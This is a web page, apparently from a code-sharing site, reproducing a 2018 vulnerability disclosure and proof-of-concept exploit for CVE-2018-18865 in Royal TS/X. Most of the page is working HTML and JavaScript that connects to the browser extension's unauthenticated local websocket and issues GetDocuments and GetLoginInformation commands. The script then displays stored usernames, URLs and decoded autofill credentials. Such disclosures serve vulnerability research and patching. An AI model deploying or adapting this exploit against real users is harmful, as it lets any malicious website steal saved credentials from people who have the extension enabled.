扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 |
<!-- Title: Royal TS/X - Information Disclosure Author: Jakub Palaczynski Date: 10. July 2018 CVE: CVE-2018-18865 Affected product: ============= Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta Vulnerability - Information Disclosure: ============================= Any third party web application can steal credentials created in Royal TS/X when browser extension is enabled. Browser extension communicates using websockets (default TCP port 54890) and websockets do not use any validation to verify origin of the request. PoC website: ========== --> <!DOCTYPE html> <meta charset="utf-8" /> <title>RoyalTS/X Exploit</title> <script language="javascript" type="text/javascript"> var wsUri = "ws://127.0.0.1:54890/"; var output; function init() { output = document.getElementById("output"); testWebSocket(); } function testWebSocket() { writeToScreen("Let's retrieve some data..."); websocket = new WebSocket(wsUri); websocket.onopen = function(evt) { onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}") }; websocket.onclose = function(evt) { onClose(evt) }; websocket.onmessage = function(evt) { onMessage(evt) }; websocket.onerror = function(evt) { onError(evt) }; } function onOpen(evt,message) { doSend(message); } function onClose(evt) { } function onMessage(evt) { var obj = JSON.parse(evt.data); if (obj['Command'] == "GetDocuments") { for (var x in obj['ResponseData']){ writeToScreen("Name: " + obj['ResponseData'][x]['Name']); writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']); for (var y in obj['ResponseData'][x]['Credentials']){ writeToScreen("Username: " + obj['ResponseData'][x]['Credentials'][y]['UserName']); writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']); if (obj['ResponseData'][x]['Unlocked'] == true){ websocket.close(); websocket = new WebSocket(wsUri); websocket.onopen = function(evt) { onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\"" + obj['ResponseData'][x]['Credentials'][y]['ID'] + "\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}") }; websocket.onclose = function(evt) { onClose(evt) }; websocket.onmessage = function(evt) { onMessage(evt) }; websocket.onerror = function(evt) { onError(evt) }; } } } } else { if (obj['Command'] == "GetLoginInformation") { var obj = JSON.parse(evt.data); writeToScreen("AutoFill Data: " + atob(obj['ResponseData'])); } } } function onError(evt) { writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data); } function doSend(message) { websocket.send(message); } function writeToScreen(message) { var pre = document.createElement("p"); pre.style.wordWrap = "break-word"; pre.innerHTML = message; output.appendChild(pre); } window.addEventListener("load", init, false); </script> <h2>RoyalTS/X Exploit</h2> <div id="output"></div> <!-- Contact: ======= Jakub[dot]Palaczynski[at]gmail[dot]com --> |
体验盒子
